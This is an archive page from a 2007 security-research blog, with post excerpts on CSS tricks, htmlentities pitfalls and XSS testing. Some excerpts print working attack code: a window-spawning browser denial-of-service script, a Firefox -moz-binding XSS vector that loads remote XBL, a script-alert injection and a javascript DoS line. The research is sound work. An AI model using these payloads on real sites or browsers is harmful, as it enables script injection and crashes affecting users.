Archives for the Month of November, 2007

CSS animation!

Hacking CSS is a great challenge and can lead to interesting results, I’ve reignited my interest thanks to sirdarckcat and Thornmaker who have done some fantastic work. I wanted a way to do animation and loops in pure CSS and I think it’s sorta possible using meta refresh. I know meta refresh is slightly cheating […]

CSS toggle buttons

Thornmaker has improved my CSS logic script which is much neater and requires less styles, good work πŸ™‚ Sirdarckcat has also created multiplication which is amazing stuff, so I had a bit of spare time and I decided to see if it was possible to create toggles in CSS with a visual appearance of a […]

Browser window spawning DOS

This causes DOS in the latest Safari and maybe other browsers too. I tried it in Opera and it does create loads of tabs but seems stable enough to close it down. Enjoy! πŸ™‚ <script type="text/javascript"> window.onload = function() { setInterval(‘spawn()’,1); } function spawn() { frm = document.createElement(‘form’); = ‘x’ + Math.round(Math.random() * 100000); […]

CSS logic

Inspired by the great work of Sirdarckcat on CSK2, I’ve decided to produce a POC which performs basic logic in pure CSS. The example simply adds the numbers together depending on which checkbox you check. My next experiment will be with loops and then we can start creating some really cool games in CSS πŸ˜€ […]

Latest security news

There’s some really awesome stuff going on at the moment, I thought I’d mention a few in case you’re not aware of them. PHPIDS This is such a great project because so many talented people have been involved and have tried to hack the system. The code has moved on tremendously from the first version […]

Ultimate XSS CSS injection

Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles. Credits update The expression part of this technique was first demonstrated by Dan on the slackers forums, […]

htmlentities is badly designed

When someone uses htmlentities I’ve seen it time and time again that they expect that it filters variables from all XSS. This is wrong of course because the function requires a second parameter ENT_QUOTES which correctly replaces quote characters. Some developers aren’t even aware that quotes can lead to XSS injection. This leads me to […]

Awesome XSS

Hacking the PHPIDS again I found some cool XSS:- <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business \i\\/labs\/xbl\/xbl\.xml\#xss)> I’ve moved it onto two lines for correct display. Who’d have thought that Firefox would allow all that within the url and CSS properties πŸ˜€

WebFu crouching tab hidden dos

Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:- "><script>alert(/XSS PUNCH!/)</script> Then you can respond with the crouching tab hidden dos move:- self.location = “‘javascript:document.clear();;document.close();self.location=self.location’)”; This move can frustrate your opponent into submission.

Tag inspector

I’ve been trying to automate the stuff that I normally do when XSS testing to make it easier than writing custom scripts each time. This worked really well for my fuzzing script which fuzzed random characters embedded into tags to find unusual combinations of characters. I’ve done the same again but this time it inspects […]